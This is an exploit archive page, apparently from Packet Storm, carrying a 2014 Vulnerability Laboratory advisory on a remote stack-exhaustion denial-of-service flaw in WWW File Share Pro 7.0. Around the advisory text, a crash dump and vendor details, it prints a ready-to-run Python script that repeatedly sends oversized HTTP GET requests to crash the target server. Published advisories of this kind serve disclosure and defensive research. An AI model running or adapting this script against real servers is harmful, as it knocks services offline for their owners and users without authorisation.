exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WWW File Share Pro 7.0 Denial Of Service

WWW File Share Pro 7.0 Denial Of Service
Posted Sep 2, 2014
Authored by Ateeq ur Rehman Khan, Vulnerability Laboratory | Site vulnerability-lab.com

WWW File Share Pro version 7.0 suffers from a denial of service vulnerability.

tags | exploit, denial of service
SHA-256 | 7906f2aef912292473f86a0578ea86239c0f55b56e587c612027048f6fa0d8df

WWW File Share Pro 7.0 Denial Of Service

Change Mirror Download
Document Title:
===============
WWW File Share Pro v7.0 - Denial of Service Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1310

Video: http://www.vulnerability-lab.com/get_content.php?id=1309

http://cwe.mitre.org/data/definitions/121.html


Release Date:
=============
2014-08-30


Vulnerability Laboratory ID (VL-ID):
====================================
1310


Common Vulnerability Scoring System:
====================================
4.2


Product & Service Introduction:
===============================
WWW File Share Pro can help you share files on the internet or on the local area network. You may use it to share files between your
PC and other devices if they may access your PC with an internet browser, regardless of what Operating System is installed on them.

- Share office documents between Windows and other operating system: Mac OS X, Linux, iOS, Android, etc.
- View photos or play mp3 files stores on your PC from other portable computer or smart mobile phone: iPad, iPhone, Nexus 4, Note II, etc.
- Share files between you and other persons: your friends, your colleagues, etc.

What you need to do is to simply specify a download directory and a upload directory. Then run the internet browser on other devices to
download files from your computer or upload files from those devices to your computer. All popular internet browsers are supported, such
as Firefox, Chrome, Safari, Internet Explorer, Opera, etc. There is no need to install this software or any other software on other devices
because an internet browser is enough.

(Copy of the Vendor Homepage: http://www.wfshome.com/ )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a remote Denial of Service Vulnerability in the official WWW File Share Pro v7.0 software.


Vulnerability Disclosure Timeline:
==================================
2014-08-30: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A critical stack exhaustion buffer overflow vulnerability resulting in remote denial of service has been detected in the
latest WWW File Share PRO 7.0 software. The vulnerability can be triggered by sending a large malformed HTTP GET request to
the vulnerable server. e.g. GET /upload2.htm/A * 100000 resulting in an immediate crash of the application.

(199c.189c): Unknown exception - code c000008f (first chance)
(199c.189c): Unknown exception - code c000008f (first chance)
(199c.189c): Stack overflow - code c00000fd (first chance)

First chance exceptions are reported before any exception handling.
This exception may be expected and handled.

eax=0009334c ebx=006b7528 ecx=00000002 edx=00000000 esi=006b7528 edi=006b7528
eip=7549c42d esp=0009334c ebp=0009339c iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
KERNELBASE!RaiseException+0x58:

Recommended Bug Title: Stack Exhaustion starting at KERNELBASE!RaiseException+0x0000000000000058 (Hash=0x217757a7.0x7b922161)


Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without user interaction. For security demonstration or to reproduce
the vulnerability follow the provided information and steps below to continue.

PoC: Exploit

#!/usr/bin/python

# Exploit Title: WWW File Share PRO - Stack Exhaustion - Remote (DOS) Exploit [CWE-121]
# Date: 30th August, 2014
# Exploit Author: Ateeq Khan (ateeq@evolution-sec.com) http://www.vulnerability-lab.com Twitter: @OhTheITGuy
# Vendor Homepage: http://www.wfshome.com/
# Software Link: http://www.wfshome.com/download/wfspsetup.exe
# Version: 7.0
# Tested on: Win7 SP1 (english)

import socket,sys


if len(sys.argv) != 3:

print "\r\nUsage: ./fsp.py <target> <port>\r\n\r\n "
sys.exit(0)

try:
port = int(sys.argv[2])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1],port))

except:
print "\r\n\r\nCould not connect to target, already down? :/\r\n\r\n"
sys.exit()

count = 0
buffer = "GET /upload2.htm/"
buffer+= "\x41" * 100000
buffer+= " HTTP/1.0\r\n\r\n"

print "Sending garbage... \r\n"

while count < 500:

try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1],port))
s.send(buffer)
s.close()

except:
print "Packets succesfuly sent...\r\n"
sys.exit()




Security Risk:
==============
The security risk of the remote stack exhaustion denial of service vulnerability is estimated as medium.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Ateeq Khan (ateeq@evolution-sec.com) [Twitter: @ohtheitguy]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2014 | Vulnerability Laboratory [Evolution Security]



--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close